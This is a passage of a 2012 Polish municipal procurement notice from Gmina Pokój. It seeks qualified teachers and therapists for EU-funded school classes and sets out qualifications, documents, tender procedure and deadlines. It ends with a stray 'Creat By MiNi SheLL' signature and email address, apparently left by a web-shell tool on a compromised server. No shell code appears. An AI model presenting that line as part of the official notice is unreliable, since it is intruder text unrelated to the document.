SP Pokój do części 11: osoba posiadająca co najmniej stopień awansu zawodowego minimum nauczyciela stażysty  oraz wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym i ukończone studia podyplomowe lub kurs kwalifikacyjny uprawniające do prowadzenia zajęć specjalistycznych terapeutycznych (zajęć indywidualnych dla dziecka niepełnosprawnego, symbol niepełnosprawności 10 N, specjalistycznych zajęć terapeutycznych), Posiadają wpis do właściwego rejestru jednostek szkoleniowych (dotyczy firm szkoleniowych). 


SP Pokój do części 12: osoba posiadająca co najmniej stopień awansu zawodowego minimum nauczyciela stażysty oraz wykształcenie wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej lub studia podyplomowe lub kurs kwalifikacyjny  uprawniający  do prowadzenia zajęć  z zakresu edukacji plastycznej  (prowadzenie zajęć rozwijających zainteresowania uczniów uzdolnionych z plastycznie). Posiadają wpis do właściwego rejestru jednostek szkoleniowych (dotyczy firm szkoleniowych). 

SP Pokój do części 13: osoba posiadająca co najmniej stopień awansu zawodowego minimum nauczyciela stażysty oraz wykształcenie wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej lub studia podyplomowe lub kurs kwalifikacyjny  uprawniający  do prowadzenia zajęć  z zakresu zajęć artystycznych (prowadzenie zajęć rozwijających zainteresowania teatralne uczniów). Posiadają wpis do właściwego rejestru jednostek szkoleniowych (dotyczy firm szkoleniowych). 

SP Domaradz do części 14-19 : osoba posiadająca co najmniej stopień awansu zawodowego minimum nauczyciela stażysty oraz wykształcenie wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej (prowadzenie zajęć wyrównawczych),
Posiadają wpis do właściwego rejestru jednostek szkoleniowych (dotyczy firm szkoleniowych). 

SP Domaradz do części 20-22 : osoba posiadająca co najmniej stopień awansu zawodowego minimum nauczyciela stażysty oraz wykształcenie wyższe w zakresie logopedii z przygotowaniem pedagogicznym lub wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie logopedii lub kurs kwalifikacyjny z zakresu logopedii ( prowadzenie zajęć logopedycznych korygujących wady wymowy), Posiadają wpis do właściwego rejestru jednostek szkoleniowych (dotyczy firm szkoleniowych). 
SP Domaradz do części 23: osoba posiadająca co najmniej stopień awansu zawodowego minimum nauczyciela stażysty oraz wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym i ukończone studia podyplomowe lub kurs kwalifikacyjny w zakresie gimnastyki korekcyjnej (prowadzenie gimnastyki korekcyjnej dla dzieci z wadami postawy w tym samodzielne prowadzenie zajęć na basenie). Posiadają wpis do właściwego rejestru jednostek szkoleniowych (dotyczy firm szkoleniowych). 

SP Domaradz do części 24: osoba posiadająca co najmniej stopień awansu zawodowego minimum nauczyciela stażysty oraz wykształcenie wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej i ukończone studia podyplomowe lub kurs kwalifikacyjny uprawniające do prowadzenia zajęć socjoterapeutycznych i  psychoedukacyjnych (zajęcia socjoterapeutyczne i psychoedukacyjne), Posiadają wpis do właściwego rejestru jednostek szkoleniowych (dotyczy firm szkoleniowych).

SP Pokój do części 25: osoba posiadająca co najmniej stopień awansu zawodowego minimum nauczyciela stażysty oraz wykształcenie wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej lub studia podyplomowe lub kurs kwalifikacyjny  uprawniający  do prowadzenia zajęć  z zakresu edukacji plastycznej  (prowadzenie zajęć rozwijających zainteresowania uczniów uzdolnionych z plastycznie). Posiadają wpis do właściwego rejestru jednostek szkoleniowych (dotyczy firm szkoleniowych).
 
SP Pokój do części 26: osoba posiadająca co najmniej stopień awansu zawodowego minimum nauczyciela stażysty oraz wykształcenie wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej lub studia podyplomowe lub kurs kwalifikacyjny  uprawniający  do prowadzenia zajęć  z zakresu zajęć artystycznych (prowadzenie zajęć rozwijających zainteresowania teatralne uczniów). Posiadają wpis do właściwego rejestru jednostek szkoleniowych (dotyczy firm szkoleniowych).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">przygotowanie planu zajęć: analizę potrzeb w zakresie prowadzonych 
zajęć  w oparciu o umiejętności, kompetencje, zaburzenia, wady, 
zainteresowania uczestników projektu. Cele prowadzonych zajęć, metodykę 
prowadzenia zajęć, produkty i rezultaty,  monitoring, ewaluację, 
działania kontrole i korygujące.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku gdy wykonawcą jest osoba fizyczna prowadząca działalność gospodarczą należy przedłożyć - kserokopię aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, z którego wynika prawo do reprezentacji lub pełnomocnictwo (w sytuacji, gdy ofertę podpisuje osoba, której prawo do reprezentowania firmy nie wynika z dokumentu rejestrowego).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku wystąpienia siły wyższej możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy. Siła wyższa - zdarzenie lub połączenie zdarzeń obiektywnie niezależnych od Stron, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy, których Strony nie mogły przewidzieć i którym nie mogły zapobiec ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminapokoj.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Pokój, ul. Sienkiewicza 8, 46-034 Pokój. pok. 40..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.08.2012 godzina 10:00, miejsce: Urząd Gminy Pokój, ul. Sienkiewicza 8, 46-034 Pokój. sekretariat...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt JA W SZKOLE II realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com